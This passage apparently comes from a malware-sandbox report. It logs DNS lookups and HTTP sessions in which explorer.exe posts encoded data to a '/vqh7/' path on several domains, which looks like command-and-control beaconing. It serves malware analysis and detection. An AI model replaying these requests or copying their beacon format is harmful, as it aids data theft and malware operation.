                                                              Feb 10, 2023 12:45:28.382673979 CET8049692148.251.13.126192.168.2.3
                                                              Feb 10, 2023 12:45:33.473675966 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.493204117 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.493596077 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.493596077 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:33.513207912 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514517069 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514544010 CET804969381.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:33.514753103 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:35.003005028 CET4969380192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.016433954 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.036139011 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.036380053 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.036664963 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:36.056286097 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.056339025 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057223082 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057262897 CET804969481.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:36.057363033 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:37.547899008 CET4969480192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.563196898 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.584816933 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.584952116 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.585104942 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.606523037 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607533932 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607569933 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:38.607793093 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.607975960 CET4969580192.168.2.381.169.145.72
                                                              Feb 10, 2023 12:45:38.629409075 CET804969581.169.145.72192.168.2.3
                                                              Feb 10, 2023 12:45:43.636437893 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.656043053 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.656203985 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.656374931 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:43.675986052 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676640987 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676666021 CET804969681.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:43.676757097 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:45.157071114 CET4969680192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.173561096 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.193304062 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.193536997 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.193809032 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:46.213588953 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214030027 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214090109 CET804969781.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:46.214215994 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:47.704127073 CET4969780192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.726511002 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.746392965 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.746642113 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.746792078 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.766446114 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767123938 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767154932 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:48.767390013 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.767529964 CET4969880192.168.2.381.169.145.158
                                                              Feb 10, 2023 12:45:48.787126064 CET804969881.169.145.158192.168.2.3
                                                              Feb 10, 2023 12:45:54.253885984 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.379700899 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.380067110 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.380230904 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:54.500720978 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500844955 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500895977 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.500932932 CET804969975.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:54.501157045 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:55.893537998 CET4969980192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:56.914768934 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.077821016 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.077972889 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.078356981 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.241241932 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241301060 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241322994 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241360903 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241379023 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241395950 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:57.241399050 CET4970080192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:57.404419899 CET804970075.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.600841999 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.763914108 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.764055967 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.764292955 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927285910 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927357912 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927386999 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927408934 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:45:59.927592039 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927648067 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:45:59.927860975 CET4970180192.168.2.375.102.22.168
                                                              Feb 10, 2023 12:46:00.090828896 CET804970175.102.22.168192.168.2.3
                                                              Feb 10, 2023 12:46:12.199752092 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.218889952 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.219048977 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.221292973 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:12.240909100 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.240964890 CET804970291.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:12.241117954 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:23.613442898 CET4970280192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.629501104 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.649058104 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.649324894 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.649605036 CET4970380192.168.2.391.195.240.117
                                                              Feb 10, 2023 12:46:24.669061899 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669120073 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669223070 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.669276953 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.670975924 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.671022892 CET804970391.195.240.117192.168.2.3
                                                              Feb 10, 2023 12:46:24.671235085 CET4970380192.168.2.391.195.240.117
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 10, 2023 12:44:48.301093102 CET5897453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:49.294585943 CET5897453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:50.341556072 CET53589748.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:44:51.407941103 CET53589748.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:44:55.361419916 CET6372253192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:44:55.379592896 CET53637228.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:00.455368996 CET6552253192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:00.474994898 CET53655228.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:11.583144903 CET5986953192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:11.601275921 CET53598698.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:22.878492117 CET5439753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:23.216640949 CET53543978.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:33.416465998 CET5932453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:33.470618963 CET53593248.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:43.613111973 CET5901453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:43.635341883 CET53590148.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:45:54.046998024 CET6162653192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:45:54.252531052 CET53616268.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:04.943521023 CET6178753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:04.967170000 CET53617878.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:05.974512100 CET5892153192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:05.995754004 CET53589218.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:07.022134066 CET6270453192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:07.048252106 CET53627048.8.8.8192.168.2.3
                                                              Feb 10, 2023 12:46:12.089973927 CET4997753192.168.2.38.8.8.8
                                                              Feb 10, 2023 12:46:12.198293924 CET53499778.8.8.8192.168.2.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Feb 10, 2023 12:44:51.408092976 CET | 192.168.2.3 | 8.8.8.8 | cff6 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 10, 2023 12:44:48.301093102 CET | 192.168.2.3 | 8.8.8.8 | 0xa631 | Standard query (0) | www.verde-amar.info | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:44:49.294585943 CET | 192.168.2.3 | 8.8.8.8 | 0xa631 | Standard query (0) | www.verde-amar.info | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:44:55.361419916 CET | 192.168.2.3 | 8.8.8.8 | 0x9472 | Standard query (0) | www.jewelryimpact.com | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:00.455368996 CET | 192.168.2.3 | 8.8.8.8 | 0x935b | Standard query (0) | www.specigain.online | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:11.583144903 CET | 192.168.2.3 | 8.8.8.8 | 0xd3ec | Standard query (0) | www.treebarktees.com | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:22.878492117 CET | 192.168.2.3 | 8.8.8.8 | 0x94ab | Standard query (0) | www.gachthe365.site | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:33.416465998 CET | 192.168.2.3 | 8.8.8.8 | 0xfd2a | Standard query (0) | www.frogair.online | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:43.613111973 CET | 192.168.2.3 | 8.8.8.8 | 0xa128 | Standard query (0) | www.krankenzusatz.net | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:54.046998024 CET | 192.168.2.3 | 8.8.8.8 | 0x3410 | Standard query (0) | www.hotelyeah.top | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:04.943521023 CET | 192.168.2.3 | 8.8.8.8 | 0x5bd5 | Standard query (0) | www.tobinrasheedja.cyou | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:05.974512100 CET | 192.168.2.3 | 8.8.8.8 | 0xad29 | Standard query (0) | www.tobinrasheedja.cyou | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:07.022134066 CET | 192.168.2.3 | 8.8.8.8 | 0x4c62 | Standard query (0) | www.tobinrasheedja.cyou | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:12.089973927 CET | 192.168.2.3 | 8.8.8.8 | 0x42aa | Standard query (0) | www.nativealternatives.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 10, 2023 12:44:50.341556072 CET | 8.8.8.8 | 192.168.2.3 | 0xa631 | Server failure (2) | www.verde-amar.info | none | none | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:44:51.407941103 CET | 8.8.8.8 | 192.168.2.3 | 0xa631 | Server failure (2) | www.verde-amar.info | none | none | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:44:55.379592896 CET | 8.8.8.8 | 192.168.2.3 | 0x9472 | No error (0) | www.jewelryimpact.com |  | 81.17.18.198 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:00.474994898 CET | 8.8.8.8 | 192.168.2.3 | 0x935b | No error (0) | www.specigain.online |  | 199.192.22.198 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:11.601275921 CET | 8.8.8.8 | 192.168.2.3 | 0xd3ec | No error (0) | www.treebarktees.com | treebarktees.com |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 10, 2023 12:45:11.601275921 CET | 8.8.8.8 | 192.168.2.3 | 0xd3ec | No error (0) | treebarktees.com |  | 103.191.208.50 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:23.216640949 CET | 8.8.8.8 | 192.168.2.3 | 0x94ab | No error (0) | www.gachthe365.site | gachthe365.site |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 10, 2023 12:45:23.216640949 CET | 8.8.8.8 | 192.168.2.3 | 0x94ab | No error (0) | gachthe365.site |  | 148.251.13.126 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:33.470618963 CET | 8.8.8.8 | 192.168.2.3 | 0xfd2a | No error (0) | www.frogair.online | frogair.online |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 10, 2023 12:45:33.470618963 CET | 8.8.8.8 | 192.168.2.3 | 0xfd2a | No error (0) | frogair.online |  | 81.169.145.72 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:43.635341883 CET | 8.8.8.8 | 192.168.2.3 | 0xa128 | No error (0) | www.krankenzusatz.net | krankenzusatz.net |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 10, 2023 12:45:43.635341883 CET | 8.8.8.8 | 192.168.2.3 | 0xa128 | No error (0) | krankenzusatz.net |  | 81.169.145.158 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:45:54.252531052 CET | 8.8.8.8 | 192.168.2.3 | 0x3410 | No error (0) | www.hotelyeah.top | hotelyeah.top |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 10, 2023 12:45:54.252531052 CET | 8.8.8.8 | 192.168.2.3 | 0x3410 | No error (0) | hotelyeah.top |  | 75.102.22.168 | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:04.967170000 CET | 8.8.8.8 | 192.168.2.3 | 0x5bd5 | Name error (3) | www.tobinrasheedja.cyou | none | none | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:05.995754004 CET | 8.8.8.8 | 192.168.2.3 | 0xad29 | Name error (3) | www.tobinrasheedja.cyou | none | none | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:07.048252106 CET | 8.8.8.8 | 192.168.2.3 | 0x4c62 | Name error (3) | www.tobinrasheedja.cyou | none | none | A (IP address) | IN (0x0001) | false
Feb 10, 2023 12:46:12.198293924 CET | 8.8.8.8 | 192.168.2.3 | 0x42aa | No error (0) | www.nativealternatives.com |  | 91.195.240.117 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49683 | 81.17.18.198 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:44:55.405932903 CET | 124 | OUT | GET /vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.jewelryimpact.com
                                                              Connection: close
Feb 10, 2023 12:44:55.434031010 CET | 125 | IN | HTTP/1.1 200 OK
                                                              accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                              cache-control: max-age=0, private, must-revalidate
                                                              connection: close
                                                              content-length: 618
                                                              content-type: text/html; charset=utf-8
                                                              date: Fri, 10 Feb 2023 11:44:54 GMT
                                                              server: nginx
                                                              set-cookie: sid=569369b8-a938-11ed-a437-6382673eb5bc; path=/; domain=.jewelryimpact.com; expires=Wed, 28 Feb 2091 14:59:02 GMT; max-age=2147483647; HttpOnly
                                                              Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NjAzNjY5NSwiaWF0IjoxNjc2MDI5NDk1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDE3N3NoamMwOHFzdm9zczAzb3Iwb2QiLCJuYmYiOjE2NzYwMjk0OTUsInRzIjoxNjc2MDI5NDk1NDE2NDEwfQ.dUGNYnSGjtn3GBFYYqpf3srYB8p3JF8jfSVsCnv0Y0Y&sid=569369b8-a938-11ed-a437-6382673eb5bc&u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg%3D%3D');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49684 | 199.192.22.198 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:45:00.737787962 CET | 126 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.specigain.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.specigain.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
Feb 10, 2023 12:45:01.060570002 CET | 127 | IN | HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:00 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49693 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:45:33.493596077 CET | 194 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.frogair.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.frogair.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=3wne7HeND3LCb-vUjAqBwroRYT7Ak-RDxTlds8kUvVNTqXnZdmDYSunHg8sRRJBVXoaFG-9q9rtpq4z19i45A_~tHQSjEbO3IbjTb9SMOV~zFwwFst40CJYq0S7yVlZUftbksZGLkdEdbXUUxeyhzzC1lib3VnbxSCuh4FjqiCwQWhn_dg).
Feb 10, 2023 12:45:33.514517069 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:33 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49694 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:45:36.036664963 CET | 200 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.frogair.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.frogair.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
Feb 10, 2023 12:45:36.057223082 CET | 201 | IN | HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:36 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49695 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:45:38.585104942 CET | 202 | OUT | GET /vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
Feb 10, 2023 12:45:38.607533932 CET | 202 | IN | HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:38 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49696 | 81.169.145.158 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 10, 2023 12:45:43.656374931 CET | 203 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.krankenzusatz.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.krankenzusatz.net/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=(1dhov7oOa5Ih-Vk604yxm3L871UxZcgZfUYVhgkd74RIK0mVfQ6rmTfRZKT(3x0LKP3z20QRkCq8JlanrHU5lfxZiS0NtKTrSHhGBw5Vhh_1EIRjNIxWtvSBDn6nr8Fe8jZTuaPYNyyj68OMDdZ52st8pPeI6uREGCX~x~GEllOLgpmVw).
                                                              Feb 10, 2023 12:45:43.676640987 CET | 204 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:43 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/
                                                              Content-Length: 243
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/">here</a>.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              14 | 192.168.2.3 | 49697 | 81.169.145.158 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:46.193809032 CET | 210 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.krankenzusatz.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.krankenzusatz.net/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Feb 10, 2023 12:45:46.214030027 CET | 210 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:46 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/
                                                              Content-Length: 243
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/">here</a>.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              15 | 192.168.2.3 | 49698 | 81.169.145.158 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:48.746792078 CET | 211 | OUT | GET /vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:48.767123938 CET | 212 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:48 GMT
